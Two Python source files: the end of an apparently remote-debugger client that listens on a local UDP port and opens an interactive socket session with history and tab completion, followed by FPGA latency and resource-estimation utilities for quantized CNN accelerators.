value = highlight(value, lexer(), formatter)
# Properly format line numbers when they show up in multi-line strings
strcolor, _ = formatter.style_string['Token.Literal.String']
intcolor, _ = formatter.style_string['Token.Literal.Number.Integer']
value = re.sub(
r'%s([0-9]+)' % re.escape(strcolor),
lambda match: intcolor + match.group(1) + strcolor,
value,
)
# Highlight the "current" line in yellow for visibility
lineno = im_self.curframe.f_lineno
value = re.sub(
'(?<!\()%s%s[^\>]+>[^\[]+\[39m([^\x1b]+)[^m]+m([^\n]+)' % (re.escape(intcolor), lineno), # noqa
lambda match: ''.join([
str(lineno),
' ->',
'\x1b[93m',
match.group(1),
re.sub('\x1b[^m]+m', '', match.group(2)),
'\x1b[0m'
]),
value
)
if filepart:
_, first = filepart
value = '\n'.join(value.splitlines()[-context:]) + '\n'
if value.strip():
old_stdout.write(value)
im_self.stdout = old_stdout
def listen():
queue = Queue()
def _consume(queue):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 6899))
print('listening for sdb notifications on :6899...')
while True:
r, w, x = select.select([sock], [], [])
for i in r:
data = i.recv(1024)
queue.put(data)
worker = threading.Thread(target=_consume, args=(queue,))
worker.setDaemon(True)
worker.start()
orig_tty = termios.tcgetattr(sys.stdin)
try:
tty.setcbreak(sys.stdin.fileno())
while True:
try:
port = queue.get(timeout=1)
queue.task_done()
if port == 'q':
break
port = int(port)
print('opening telnet session at port :%d...' % port)
telnet(port).connect()
print('listening for sdb notifications on :6899...')
except Empty:
pass
except KeyboardInterrupt:
print('got Ctrl-C')
queue.put('q')
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, orig_tty)
class telnet(object):
line_buff = ''
completing = None
history_pos = 0
def __init__(self, port, stdin=sys.stdin, stdout=sys.stdout):
self.port = port
self.stdin = stdin
self.stdout = stdout
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(2)
self.history = []
def connect(self):
try:
self.sock.connect(('0.0.0.0', self.port))
except Exception:
print('unable to connect')
return
print('connected to %s:%d' % ('0.0.0.0', self.port))
while True:
socket_list = [self.stdin, self.sock]
try:
r, w, e = select.select(socket_list, [], [])
for sock in r:
if sock == self.sock:
data = self.sock.recv(4096)
if not data:
print('connection closed')
return
self.recv(data)
else:
self.send()
except select.error as e:
if e[0] != errno.EINTR:
raise
def recv(self, data):
if self.completing is not None:
self.stdout.write('\x1b[2K\r')
matches = data.decode('utf-8').split(' ')
first = matches[0]
if len(matches) > 1:
if self.completing:
self.line_buff = self.line_buff.replace(
self.completing, first
)
matches[0] = (
'\033[93m' + first + '\033[0m'
)
self.stdout.write(
'\n'.join(matches) + '\n' + self.line_buff
)
else:
if self.completing:
self.line_buff = self.line_buff.replace(
self.completing, first
)
self.stdout.write(self.line_buff)
else:
self.stdout.write('\n')
self.stdout.write(data.decode('utf-8'))
self.stdout.flush()
def send(self):
char = self.stdin.read(1)
if char == '\x1b':
char += self.stdin.read(2)
if char in ('\x1b[A', '\x1b[B'):
if char == '\x1b[A':
self.history_pos -= 1
if char == '\x1b[B':
self.history_pos += 1
if self.history_pos < 0:
self.history_pos = -1
self.line_buff = ''
else:
try:
self.line_buff = self.history[self.history_pos]
except IndexError:
self.history_pos = len(self.history)
self.line_buff = ''
self.stdout.write('\x1b[2K\r%s' % self.line_buff)
elif char == '\n':
self.completing = None
self.history_pos += 1
self.history.append(self.line_buff)
self._send(
self.line_buff.encode('utf-8') + '\n'.encode('utf-8')
)
self.line_buff = ''
elif char == '\t':
self.completing = self.line_buff.rsplit(' ', 1)[-1]
self._send(
self.completing.encode('utf-8') + '<!TAB!>\n'.encode('utf-8') # noqa
)
elif char in ('\x08', '\x7f'):
self.line_buff = self.line_buff[:-1]
self.stdout.write('\x1b[2K\r%s' % self.line_buff)
else:
self.line_buff += char
self.stdout.write(char)
self.stdout.flush()
def _send(self, line):
self.sock.send(line) # pragma: nocover
if __name__ == '__main__':
listen() # pragma: nocover
|
predictor_utilities.py
|
import os
import numpy as np
import math
import re
import time
from multiprocessing import Queue
import multiprocessing
######################################
## common utilities
######################################
def closestMultiple(n, x):
    if x > n:
        return x
    z = x // 2
    n = n + z
    n = n - (n % x)
    return n
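# Hedged examples (not in the original source) of closestMultiple's behaviour:
# it rounds n to a nearby multiple of x, but never returns less than x itself.
#   closestMultiple(13, 4) -> 12
#   closestMultiple(14, 4) -> 16
#   closestMultiple(3, 8)  -> 8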
def multi_p(func,args,output_q,num_worker_threads,dump_yard):
    # Routine to distribute workers across multiple cores
    # BETTER: leave this as it is
    # The length of args has to be a multiple of num_worker_threads
args=list(args)
run_ites=int((len(args))//num_worker_threads)
for run_ite in range(run_ites):
processes = [multiprocessing.Process(target=func, args=([args[i]])) for i in range(run_ite*num_worker_threads,(run_ite+1)*num_worker_threads)]
#print(len(processes))
#print('queue size: ',score_pair.qsize())
for p in processes:
p.start()
time.sleep(0.01)
        print('all jobs started')
while not output_q.empty():
pair=output_q.get()
dump_yard.append(pair)
for p in processes:
p.join()
        print('all jobs finished')
while not output_q.empty():
pair=output_q.get()
dump_yard.append(pair)
return None
######################################
##FPGA performance predictor specific
######################################
def model_profiler(net_struct,layer_block_corr=None):
param_size=0
param_size_bits=0
mac_size=1
block_wise_performance={}
if layer_block_corr!= None:
for key in layer_block_corr.keys():
block_wise_performance[key]=0
for i, layer_struct in enumerate(net_struct):
mac_size+=(layer_struct[0]*layer_struct[1]*(layer_struct[2]**2)*(layer_struct[3]**2))
param_size+=(layer_struct[0]*layer_struct[1]*(layer_struct[3]**2))
if layer_block_corr!= None:
for key in layer_block_corr.keys():
if i in layer_block_corr[key]:
block_wise_performance[key]+=(layer_struct[0]*layer_struct[1]*(layer_struct[2]**2)*(layer_struct[3]**2))
#break
#print(mac_size)
return param_size,mac_size,block_wise_performance
def pack_data(fn,keyword):
files=os.listdir(fn)
packed_data=[]
for f in files:
if(keyword in f):
raw=np.load(fn+f,allow_pickle=True)
for dp in raw:
packed_data.append([dp[0][0][:]+[dp[0][1]],dp[1][0]])
return packed_data
def comp_engine_lat(comp_mode,input_params,net_struct):
result_lat=1
if comp_mode==0:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6])
elif comp_mode==1:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6]/input_params[7])
elif comp_mode==2:
result_lat*=(input_params[2]*input_params[3]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[4])
#print('comp lat ', result_lat)
return result_lat
def dw_comp_engine_lat(comp_mode,input_params,net_struct):
if input_params[3] !=1:
print(input_params)
raise Exception('input channel & corresponding tiling needs to be set as one for dw conv')
result_lat=1
if comp_mode==0:
result_lat*=(input_params[2]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[6])
elif comp_mode==1:
result_lat*=(input_params[2]*input_params[0]*input_params[1]*net_struct[3]\
*net_struct[3]/input_params[4])
else:
raise Exception('non-supported comp mode')
return result_lat
def read_if_lat(comp_mode,input_params,net_struct,quant=16):
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
if comp_mode==2:
return math.ceil(input_params[3]*tci*tri/max(min(4,tri),2))*(quant/16)
else:
return math.ceil(input_params[3]*tci*tri/max(min(4,input_params[7]),2))*(quant/16)
def dw_read_if_lat(comp_mode,input_params,net_struct,quant=16):
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
if comp_mode==2:
return math.ceil(input_params[2]*tci*tri/max(min(4,tri),2))*(quant/16)
else:
return math.ceil(input_params[2]*tci*tri/max(min(4,input_params[6]),2))*(quant/16)
def read_we_lat(comp_mode,input_params,net_struct,quant=16):
if comp_mode==2:
#print('weight loading',input_params[2]*input_params[3]*net_struct[3] )
return input_params[2]*input_params[3]*net_struct[3]*(quant/16)
else:
return math.ceil(input_params[2]*input_params[3]*net_struct[3]*net_struct[3]/max(min(4,input_params[6]),2))*(quant/16)
def dw_read_we_lat(comp_mode,input_params,net_struct,quant=16):
if input_params[3] !=1:
raise Exception('input channel & corresponding tiling needs to be set as one for dw conv')
if comp_mode==1:
return input_params[2]*input_params[3]*net_struct[3]*(quant/16)
else:
return math.ceil(input_params[2]*input_params[3]*net_struct[3]*net_struct[3]/max(min(4,input_params[6]),2))*(quant/16)
def write_ofmap(comp_mode,input_params,net_struct,quant=16):
if comp_mode==2:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[4]),2))
clear_buffer=input_params[1]*input_params[2]*(input_params[0]/input_params[4])
else:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[6]),2))
clear_buffer=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
#print('clear output', read_write_1, clear_buffer)
return (read_write_1+clear_buffer)*(quant/16)
def dw_write_ofmap(comp_mode,input_params,net_struct,quant=16):
if comp_mode==1:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[4]),2))
clear_buffer=input_params[1]*input_params[2]*(input_params[0]/input_params[4])
else:
read_write_1=math.ceil(input_params[2]*input_params[0]*input_params[1]/max(min(4,input_params[6]),2))
clear_buffer=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
#print('clear output', read_write_1, clear_buffer)
return (read_write_1+clear_buffer)*(quant/16)
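# Hedged reading of the parameters used below (inferred from how they are indexed,
# not documented in the original source): net_struct appears to be
# [in_channels, out_channels, feature_map_size, kernel_size] and input_params
# appears to start with the tile sizes [Tr, Tc, Tm, Tn, ...], so each
# outer_loop_* below counts how many tiles are needed to cover that dimension.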
def combined_latency(comp_mode, input_params,net_struct,quant=16):
outer_loop_tc=net_struct[2]/input_params[1]
outer_loop_tr=net_struct[2]/input_params[0]
outer_loop_tm=net_struct[1]/input_params[2]
outer_loop_tn=net_struct[0]/input_params[3]
read_if_we_comp=max(comp_engine_lat(comp_mode,input_params,net_struct), read_if_lat(comp_mode,input_params,net_struct,quant=quant))+read_we_lat(comp_mode,input_params,net_struct,quant=quant)
read_if_we_comp_tn=read_if_we_comp*outer_loop_tn
inner_lat=write_ofmap(comp_mode,input_params,net_struct,quant=quant)+read_if_we_comp_tn
return inner_lat*outer_loop_tc*outer_loop_tr*outer_loop_tm
def dw_combined_latency(comp_mode, input_params,net_struct,quant=16):
outer_loop_tc=net_struct[2]/input_params[1]
outer_loop_tr=net_struct[2]/input_params[0]
outer_loop_tm=net_struct[1]/input_params[2]
read_if_we_comp=max(dw_comp_engine_lat(comp_mode,input_params,net_struct),\
dw_read_if_lat(comp_mode,input_params,net_struct,quant=quant))+\
dw_read_we_lat(comp_mode,input_params,net_struct,quant=quant)+\
dw_write_ofmap(comp_mode,input_params,net_struct,quant=quant)
return outer_loop_tc*outer_loop_tr*outer_loop_tm*read_if_we_comp
def resource_consumption(comp_mode,input_params,net_struct,dw=False,quant=16):
max_bank_size=1125*16
if not dw:
if comp_mode==0:
#TODO: cases using completely LUT
if quant > 16:
dsp=input_params[6]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]
elif quant <= 8:
dsp=max(1,input_params[6]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[3]/input_params[7])
input_bram=input_params[7]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
            #TODO: output-channel tiling only; the input channel is still tiled, fix on the auto_runner side
            # and separate the parallelism choices for the kernel's input_channel and output_channel
weight_bank_size=net_struct[3]*net_struct[3]*input_params[3]*(input_params[2]/input_params[6])
weight_bram=input_params[6]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==1:
if quant > 16:
dsp=input_params[6]*input_params[7]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]*input_params[7]
elif quant <= 8:
dsp=max(1,input_params[6]*input_params[7]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[3]/input_params[7])
input_bram=input_params[7]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*net_struct[3]*(input_params[3]/input_params[7])*(input_params[2]/input_params[6])
weight_bram=input_params[6]*input_params[7]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==2:
            #TODO: add the cost of the additional adder tree
if quant > 16:
dsp=input_params[4]*2
elif quant <=16 and quant > 8:
dsp=input_params[4]
elif quant <= 8:
dsp=max(1,input_params[4]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tci*input_params[3]
input_bram=tri*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[1]*input_params[2]
output_bram=input_params[4]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*input_params[2]*input_params[3]
weight_bram=net_struct[3]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram+weight_bram
else:
if comp_mode==0:
            #TODO: handle the cases implemented entirely with LUTs
if quant > 16:
dsp=input_params[6]*2
elif quant <=16 and quant > 8:
dsp=input_params[6]
elif quant <= 8:
dsp=max(1,input_params[6]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tri*tci*(input_params[2]/input_params[6])
input_bram=input_params[6]*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[0]*input_params[1]*(input_params[2]/input_params[6])
output_bram=input_params[6]*math.ceil(output_bank_size*quant/max_bank_size)
            #TODO: output-channel tiling only; the input channel is still tiled, fix on the auto_runner side
            # and separate the parallelism choices for the kernel's input_channel and output_channel
weight_bank_size=net_struct[3]*net_struct[3]*(input_params[2]/input_params[6])
weight_bram=input_params[6]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram
elif comp_mode==1:
if quant > 16:
dsp=input_params[4]*2
elif quant <=16 and quant > 8:
dsp=input_params[4]
elif quant <= 8:
dsp=max(1,input_params[4]//2)
#BRAM calculation
tri=max(input_params[4]+net_struct[3]-1,input_params[0])
tci=max(input_params[5]+net_struct[3]-1,input_params[1])
input_bank_size=tci*input_params[3]
input_bram=tri*math.ceil(input_bank_size*quant/max_bank_size)*2
output_bank_size=input_params[1]*input_params[2]
output_bram=input_params[4]*math.ceil(output_bank_size*quant/max_bank_size)
weight_bank_size=net_struct[3]*input_params[2]
weight_bram=net_struct[3]*math.ceil(weight_bank_size*quant/max_bank_size)
total_bram=input_bram+output_bram+weight_bram
return (dsp,total_bram)
def sys_latency(input_params_set,net_struct,dw,accelerator_alloc,accelerator_wise_budget):
    #input_params_set: {accelerator_name: [comp_mode,fw,fh,of,if,f(fw),f(fh),f(of),f(if),quant]}
    #net_struct: [[...], ...] with one entry per layer
    #accelerator_alloc: {layer_num: accelerator_name}
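    #Editor's illustration (hedged): concrete shapes assumed from the key ordering in
    #design_choice_gen/random_sample below and the indexing used by the latency functions above,
    #e.g. input_params_set = {'a0q16': [comp_mode, trbuff, tcbuff, tmbuff, tnbuff, tr, tc, tm, tn, quant]}
    #and accelerator_alloc = {0: 'a0q16', 1: 'dwa0q16'}; net_struct entries follow the
    #5-element layout produced by cifar_convert_to_layers below.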
latency_break_down={}
layer_wise_break_down_to_accel={}
layer_wise_break_down=[]
for i in input_params_set.keys():
latency_break_down[i]=0
layer_wise_break_down_to_accel[i]=[]
for i, layer_struct in enumerate(net_struct):
input_params=input_params_set[accelerator_alloc[i]]
if dw[i]:
tmp_lat=dw_combined_latency(input_params[0],input_params[1:9],layer_struct,quant=input_params[-1])
latency_break_down[accelerator_alloc[i]]+=tmp_lat
layer_wise_break_down_to_accel[accelerator_alloc[i]].append(tmp_lat)
layer_wise_break_down.append(tmp_lat)
else:
tmp_lat=combined_latency(input_params[0],input_params[1:9],layer_struct,quant=input_params[-1])
latency_break_down[accelerator_alloc[i]]+=tmp_lat
layer_wise_break_down_to_accel[accelerator_alloc[i]].append(tmp_lat)
layer_wise_break_down.append(tmp_lat)
bottleneck_latency=0
for i in latency_break_down.keys():
if latency_break_down[i] >bottleneck_latency:
bottleneck_latency=latency_break_down[i]
return bottleneck_latency, latency_break_down,layer_wise_break_down_to_accel,layer_wise_break_down
def sys_consumption(input_params_set,net_struct,dw,accelerator_alloc,accelerator_wise_budget,platform_specs):
    #input_params_set: {accelerator_name: [comp_mode,fw,fh,of,if,f(fw),f(fh),f(of),f(if),quant]}
    #net_struct: [[...], ...] with one entry per layer
    #accelerator_alloc: {layer_num: accelerator_name}
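    #(the same illustrative layouts noted in sys_latency above are assumed here)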
consumption_breakdown={}
for i in input_params_set.keys():
consumption_breakdown[i]=[0,0]
for i, layer_struct in enumerate(net_struct):
input_params=input_params_set[accelerator_alloc[i]]
consumption_breakdown[accelerator_alloc[i]]= [max(consumption_breakdown[accelerator_alloc[i]][0],\
resource_consumption(input_params[0],input_params[1:9],\
layer_struct,dw=dw[i],quant=input_params[-1])[0]),\
max(consumption_breakdown[accelerator_alloc[i]][1],\
resource_consumption(input_params[0],input_params[1:9],\
layer_struct,dw=dw[i],quant=input_params[-1])[1])]
total_dsp_used=0
total_bram_used=0
for i in consumption_breakdown.keys():
total_dsp_used+=consumption_breakdown[i][0]
total_bram_used+=consumption_breakdown[i][1]
if total_dsp_used>platform_specs['dsp']:
raise Exception('dsp limit exceeded')
elif total_bram_used>platform_specs['bram']:
raise Exception('bram exceeded')
for i in accelerator_wise_budget.keys():
if consumption_breakdown[i][0] > accelerator_wise_budget[i]['dsp']:
print("Warning: accelerator "+str(i)+" dsp budget exceeded")
elif consumption_breakdown[i][1]> accelerator_wise_budget[i]['bram']:
print("Warning: accelerator "+str(i)+" bram budget exceeded")
return (total_dsp_used,total_bram_used), consumption_breakdown
def allocate_layers(net_struct,quant_list,dw,platform_specs,layer_block_corr,cifar=True,edd=False,channel_part=False):
dw_quantization_bins={}
std_quantization_bins={}
accelerator_alloc={}
accelerator_wise_budget={}
accelerator_types=[]
for i, layer_struct in enumerate(net_struct):
if dw[i]:
if quant_list[i] not in dw_quantization_bins.keys():
#initiate the bins
dw_quantization_bins[quant_list[i]]=[i]
else:
#add layers to the corresponding bins
dw_quantization_bins[quant_list[i]].append(i)
else:
if quant_list[i] not in std_quantization_bins.keys():
#initiate the bins
std_quantization_bins[quant_list[i]]=[i]
else:
#add layers to the corresponding bins
std_quantization_bins[quant_list[i]].append(i)
if not channel_part:
if cifar:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if net_struct[layer][2]>=16:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
else:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if net_struct[layer][2]>=16:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
else:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
else:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if net_struct[layer][2]>=28:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
else:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if net_struct[layer][2]>=28:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
else:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
else:
#applies specifically to Yonggan's space
if not edd:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3] or\
layer in layer_block_corr[4]:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
elif layer in layer_block_corr[5] or layer in layer_block_corr[6] or\
layer in layer_block_corr[7] or layer in layer_block_corr[8]:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
elif layer in layer_block_corr[9] or layer in layer_block_corr[10] or\
layer in layer_block_corr[11] or layer in layer_block_corr[12]:
if "a2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a2"+"q"+str(quant_bit))
accelerator_alloc[layer]="a2"+"q"+str(quant_bit)
elif layer in layer_block_corr[13] or layer in layer_block_corr[14] or\
layer in layer_block_corr[15] or layer in layer_block_corr[16]:
if "a3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a3"+"q"+str(quant_bit))
accelerator_alloc[layer]="a3"+"q"+str(quant_bit)
elif layer in layer_block_corr[17] or layer in layer_block_corr[18] or\
layer in layer_block_corr[19] or layer in layer_block_corr[20] or\
layer in layer_block_corr[21]:
if "a4"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a4"+"q"+str(quant_bit))
accelerator_alloc[layer]="a4"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3] or\
layer in layer_block_corr[4]:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
elif layer in layer_block_corr[5] or layer in layer_block_corr[6] or\
layer in layer_block_corr[7] or layer in layer_block_corr[8]:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
elif layer in layer_block_corr[9] or layer in layer_block_corr[10] or\
layer in layer_block_corr[11] or layer in layer_block_corr[12]:
if "dwa2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa2"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa2"+"q"+str(quant_bit)
elif layer in layer_block_corr[13] or layer in layer_block_corr[14] or\
layer in layer_block_corr[15] or layer in layer_block_corr[16]:
if "dwa3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa3"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa3"+"q"+str(quant_bit)
elif layer in layer_block_corr[17] or layer in layer_block_corr[18] or\
layer in layer_block_corr[19] or layer in layer_block_corr[20] or\
layer in layer_block_corr[21]:
if "dwa4"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa4"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa4"+"q"+str(quant_bit)
else:
for i, quant_bit in enumerate(std_quantization_bins.keys()):
for layer in std_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1] or\
layer in layer_block_corr[2] or layer in layer_block_corr[3]:
if "a0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a0"+"q"+str(quant_bit))
accelerator_alloc[layer]="a0"+"q"+str(quant_bit)
elif layer in layer_block_corr[4] or layer in layer_block_corr[5]or\
layer in layer_block_corr[6] or layer in layer_block_corr[7]:
if "a1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a1"+"q"+str(quant_bit))
accelerator_alloc[layer]="a1"+"q"+str(quant_bit)
elif layer in layer_block_corr[8] or layer in layer_block_corr[9]or\
layer in layer_block_corr[10] or layer in layer_block_corr[11]:
if "a2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a2"+"q"+str(quant_bit))
accelerator_alloc[layer]="a2"+"q"+str(quant_bit)
elif layer in layer_block_corr[12] or layer in layer_block_corr[13]or\
layer in layer_block_corr[14] or layer in layer_block_corr[15]:
if "a3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("a3"+"q"+str(quant_bit))
accelerator_alloc[layer]="a3"+"q"+str(quant_bit)
for i, quant_bit in enumerate(dw_quantization_bins.keys()):
for layer in dw_quantization_bins[quant_bit]:
if layer in layer_block_corr[0] or layer in layer_block_corr[1]or\
layer in layer_block_corr[2] or layer in layer_block_corr[3]:
if "dwa0"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa0"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa0"+"q"+str(quant_bit)
elif layer in layer_block_corr[4] or layer in layer_block_corr[5]or\
layer in layer_block_corr[6] or layer in layer_block_corr[7]:
if "dwa1"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa1"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa1"+"q"+str(quant_bit)
elif layer in layer_block_corr[8] or layer in layer_block_corr[9]or\
layer in layer_block_corr[10] or layer in layer_block_corr[11]:
if "dwa2"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa2"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa2"+"q"+str(quant_bit)
elif layer in layer_block_corr[12] or layer in layer_block_corr[13]or\
layer in layer_block_corr[14] or layer in layer_block_corr[15]:
if "dwa3"+"q"+str(quant_bit) not in accelerator_types:
accelerator_types.append("dwa3"+"q"+str(quant_bit))
accelerator_alloc[layer]="dwa3"+"q"+str(quant_bit)
# print("="*20)
# print(len(net_struct))
# print(len(list(accelerator_alloc.keys())))
# print(accelerator_alloc)
# print("="*20)
#return None
return accelerator_alloc, accelerator_types, accelerator_wise_budget
def cifar_convert_to_layers(block_info,quant_list,cifar=True,edd=False):
#TODO: include EDD cases
if cifar:
output_dim=[32]+[32]*4+[16]*4+[8]*4+[8]*4+[4]*4+[4]
num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
        #currently only supports 1
#num_layer_list = [1, 4, 4, 4, 4, 4, 1]
#num_channel_list = [16, 24, 32, 64, 112, 184, 352]
num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
stride_list = [1, 1,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
else:
output_dim=[112]+[56]*4+[28]*4+[14]*4+[14]*4+[7]*4+[7]
num_layer_list = [1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1, 1]
#num_layer_list = [1, 4, 4, 4, 4, 4, 1]
#num_channel_list = [16, 24, 32, 64, 112, 184, 352]
num_channel_list = [16]+[24]*4+[32]*4+[64]*4+[112]*4+[192]*4+[352]
stride_list = [1, 2,1,1,1, 2,1,1,1, 2,1,1,1, 1,1,1,1, 2,1,1,1, 1]
if edd:
output_dim=[56,28,28,28,28,14,14,14,14,14,14,7,7,7,7,7]
num_layer_list= [1,1,1,1, 1,1,1,1, 1,1,1,1, 1,1,1,1]
num_channel_list =[32,48,48,48, 96,96,96,96, 128,128,128,256, 256,256,256,320]
stride_list=[2,2,1,1, 1,2,1,1, 1,1,1,2, 1,1,1,1]
net_struct=[]
dw=[]
layer_wise_quant=[]
layer_block_corr={}
for i in range(sum(num_layer_list)):
layer_block_corr[i]=[]
layer_num=0
for i, rep_times in enumerate(num_layer_list):
if "g" not in block_info[i] and block_info[i] != "skip":
k=int(block_info[i][1])
e=int(block_info[i][4])
if num_layer_list[i]==1:
if i==0:
#TODO: confirm if the layer dimension is right
net_struct.append([16,16*e,output_dim[0],1,1])
net_struct.append([1,16*e,output_dim[0],k,1])
net_struct.append([16*e,16,output_dim[0],1,1])
dw+=[False,True,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
layer_block_corr[0]+=[0,1,2]
layer_num+=3
else:
net_struct.append([num_channel_list[i-1],num_channel_list[i-1]*e,output_dim[i-1],1,stride_list[i]])
net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
net_struct.append([num_channel_list[i-1]*e,num_channel_list[i],output_dim[i],1,1])
dw+=[False,True,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit]
layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2]
